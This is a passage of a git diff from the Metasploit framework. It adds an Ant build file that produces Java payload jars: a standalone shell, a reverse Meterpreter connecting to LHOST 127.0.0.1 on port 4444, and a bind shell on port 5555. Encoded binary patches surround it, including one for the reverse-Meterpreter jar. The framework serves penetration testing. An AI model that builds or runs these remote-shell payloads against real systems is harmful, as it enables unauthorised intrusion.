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
P7{q`u7sy)c3gQ6(<u$-J

literal 0
HcmV?d00001

diff --git a/external/source/javapayload/build.xml b/external/source/javapayload/build.xml
new file mode 100644
index 0000000000..3ae7b4212d
--- /dev/null
+++ b/external/source/javapayload/build.xml
@@ -0,0 +1,68 @@
+<?xml version="1.0"?>
+<project name="JavaPayload4Meterpreter" default="jar">
+
+	<target name="clean">
+		<delete dir="build" />
+	</target>
+
+	<target name="compile">
+		<mkdir dir="build" />
+		<javac srcdir="src" destdir="build" source="1.1" target="1.1" debug="no" />
+	</target>
+
+	<target name="jar" depends="compile">
+		<!-- main jar -->
+		<jar destfile="JavaPayload4Meterpreter.jar" basedir="build" />
+		<!-- example 1: standalone JSh -->
+		<propertyfile file="build/metasploit.dat">
+			<entry key="LPORT" value="0" />
+			<entry key="EmbeddedStage" value="JSh"/>
+		</propertyfile>
+		<jar destfile="example-standalone-jsh.jar">
+			<manifest>
+				<attribute name="Main-Class" value="metasploit.Payload"/>
+			</manifest>
+			<fileset dir="build">
+    			<include name="metasploit/Payload.class"/>
+    			<include name="javapayload/stage/Stage.class"/>
+				<include name="javapayload/stage/JSh*.class"/>
+				<include name="metasploit.dat"/>
+			</fileset>
+		</jar>
+		<delete file="build/metasploit.dat"/>
+		<!-- example 2: reverse meterpreter (like loader.jar) -->
+		<propertyfile file="build/metasploit.dat">
+			<entry key="LPORT" value="4444" />
+			<entry key="LHOST" value="127.0.0.1" />
+			<entry key="EmbeddedStage" value="Meterpreter"/>
+		</propertyfile>
+		<jar destfile="example-reverse-meterpreter.jar">
+			<manifest>
+				<attribute name="Main-Class" value="metasploit.Payload"/>
+			</manifest>
+			<fileset dir="build">
+    			<include name="metasploit/Payload.class"/>
+    			<include name="javapayload/stage/Stage.class"/>
+				<include name="com/metasploit/meterpreter/MemoryBufferURL*.class"/>
+				<include name="javapayload/stage/Meterpreter.class"/>
+				<include name="metasploit.dat"/>
+			</fileset>
+		</jar>
+		<delete file="build/metasploit.dat"/>
+		<!-- example 3: spawning bind -->
+		<propertyfile file="build/metasploit.dat">
+			<entry key="Spawn" value="2"/>
+			<entry key="LPORT" value="5555" />
+		</propertyfile>
+		<jar destfile="example-spawn-bind.jar">
+			<manifest>
+				<attribute name="Main-Class" value="metasploit.Payload"/>
+			</manifest>
+			<fileset dir="build">
+    			<include name="metasploit/Payload.class"/>
+				<include name="metasploit.dat"/>
+			</fileset>
+		</jar>
+		<delete file="build/metasploit.dat"/>
+	</target>
+</project>
diff --git a/external/source/javapayload/example-reverse-meterpreter.jar b/external/source/javapayload/example-reverse-meterpreter.jar
new file mode 100644
index 0000000000000000000000000000000000000000..05acedda29da5b3eee722cd50abe13df48fedf3a
GIT binary patch
literal 8546
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
